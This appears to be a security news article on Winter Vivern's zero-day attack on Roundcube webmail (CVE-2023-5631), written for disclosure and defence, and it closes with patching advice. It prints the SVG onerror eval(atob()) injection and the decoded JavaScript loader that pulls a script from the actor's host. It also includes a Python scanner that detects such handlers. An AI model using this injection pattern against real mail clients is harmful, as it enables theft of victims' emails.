Friday, October 27, 2023

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After reading the technical details about this zero-day, which targeted governmental entities and a think tank in Europe, and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has uncovered a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack exploits a zero-day vulnerability in Roundcube webmail; the result is the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted that the campaign has targeted governmental entities and a think tank in Europe.


Technical details about this cyberattack exploiting a zero-day in Roundcube

The threat actor begins the attack by sending a specially crafted email message with the subject line "Get started in your Outlook", sent from "team.management@outlook(.)com" (Figure A).

Figure A

Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; it is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The purpose of the malicious code is to trigger the onerror attribute by using the invalid URL x as the image's href: the image fails to load and the browser runs the handler.

Decoding the payload in the onerror attribute yields a line of JavaScript code that will be executed in the victim's browser in the context of the user's Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou's discovery. The researcher was able to establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which did not " … properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user," as stated by Faou.

The vulnerability does not need any interaction from the user other than viewing the message in a web browser, which probably explains why the threat actor did not need to use a very elaborate social engineering technique; simply viewing the content triggers the exploit.

After this initial execution of JavaScript code, a second-stage loader, also written in JavaScript and named checkupdate.js, is executed and triggers the final stage, once again written in JavaScript (Figure B).

Figure B

Part of the final JavaScript payload that exfiltrates emails from the victim. Image: ESET

The final payload gives the attacker the capability to list all folders and emails in the current Roundcube email account and to exfiltrate email messages to a command and control server via HTTP requests.

When TechRepublic asked Faou about further compromise of the system, he replied via a written message: "We haven't observed any lateral movement. The JavaScript code is only executed in the context of (the) victim's browser, in the Roundcube window. So it doesn't have access to the backend of Roundcube and escaping the browser would require a much more complicated exploit. However, they could re-use their access to launch further phishing campaigns originating from the sender who was compromised (we haven't observed this)."
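As an added illustration from the defender's side (not code from the article, from ESET or from Roundcube), the following Python scanner applies the pattern described above to an HTML mail body: it flags event-handler attributes found inside <svg> subtrees, decodes any eval(atob(...)) argument in the handler and extracts the script URLs the loader would fetch, so they can be blocklisted or matched against known indicators. The sample message, its base64 payload and the loader.example.invalid host are constructed for the example.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed sample mail body reproducing the SVG/onerror shape discussed
# above. The base64 blob encodes a placeholder loader pointing at a
# reserved .invalid host, not the real Winter Vivern payload.
LOADER = ('var fe=document.createElement("script");'
          'fe.src="https://loader.example.invalid/checkupdate.js";'
          'document.body.appendChild(fe);')
B64 = base64.b64encode(LOADER.encode()).decode()
SAMPLE_MAIL = f'''<html><body><p>Get started in your Outlook</p>
<svg id="x" xmlns="http://www.w3.org/2000/svg">
 <image href="x" onerror="eval(atob('{B64}'))" /></svg>
</body></html>'''

EVENT_ATTR = re.compile(r'^on[a-z]+$', re.I)           # onerror, onload, ...
ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL = re.compile(r'https?://[^\s"\'<>]+')


class SvgHandlerFinder(HTMLParser):
    """Collects event-handler attributes that appear inside <svg> subtrees.
    HTMLParser lower-cases tag and attribute names for us."""
    def __init__(self):
        super().__init__()
        self.depth = 0        # number of <svg> elements we are nested in
        self.findings = []    # (tag, attribute name, attribute value)

    def handle_starttag(self, tag, attrs):
        if tag == 'svg':
            self.depth += 1
        if self.depth:
            for name, value in attrs:
                if EVENT_ATTR.match(name):
                    self.findings.append((tag, name, value or ''))

    def handle_endtag(self, tag):
        if tag == 'svg' and self.depth:
            self.depth -= 1


def scan_mail_html(html):
    """Return one dict per suspicious handler: the element and attribute,
    the decoded atob() payload if present, and any URLs it references."""
    parser = SvgHandlerFinder()
    parser.feed(html)
    report = []
    for tag, attr, value in parser.findings:
        decoded, urls = None, []
        m = ATOB.search(value)
        if m:
            try:
                raw = base64.b64decode(m.group(1), validate=True)
                decoded = raw.decode('utf-8', 'replace')
                urls = URL.findall(decoded)
            except ValueError:      # binascii.Error is a ValueError
                decoded = None
        report.append({'tag': tag, 'attr': attr, 'decoded': decoded, 'urls': urls})
    return report
```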

Who is Winter Vivern?

Winter Vivern, aka TA473, is a cyberespionage threat actor whose interests are closely aligned with the governments of Russia and Belarus. The first public exposure of the Winter Vivern threat actor occurred in 2021, when it targeted several governmental entities in different countries including Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.

This threat actor has a history of exploiting webmail software: it has already abused older Roundcube vulnerabilities and known Zimbra webmail vulnerabilities to target elected officials and staffers in the U.S. as well as experts in European politics and economics. The threat actor has also targeted mailboxes of NATO-aligned government entities in Europe.

The threat actor often uses malicious documents and sometimes a PowerShell backdoor to compromise its targets. Winter Vivern uses vulnerability scanners such as Acunetix, probably to scan targeted networks.

ESET noted that Winter Vivern has been observed exploiting CVE-2020-35730, a known Roundcube vulnerability, against entities that are also targeted by the threat actor APT28, which has been described as military unit 26165 of Russia's Military Intelligence Agency, previously known as the GRU.

In addition, ESET pointed out a possible link to the threat actor MoustachedBouncer, who runs attacks against foreign diplomats in Belarus. Asked about it, Faou told TechRepublic that "there are quite unique similarities in the network infrastructure of both groups, suggesting that a common entity might provide it to both of them."

As stated by ESET regarding the current threat, "Despite the low sophistication of the group's toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities."

How to protect users from this cybersecurity threat

ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and released security updates addressing the vulnerability on Oct. 16, 2023 in versions 1.6.4, 1.4.15 and 1.5.5. It is strongly advised to patch Roundcube for this vulnerability.

It is recommended to keep all operating systems and software up to date and patched to avoid further compromise through common vulnerabilities.

Disabling JavaScript execution in the browser would mitigate this threat, yet it would greatly degrade the user's experience because many websites rely heavily on JavaScript to function.

Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
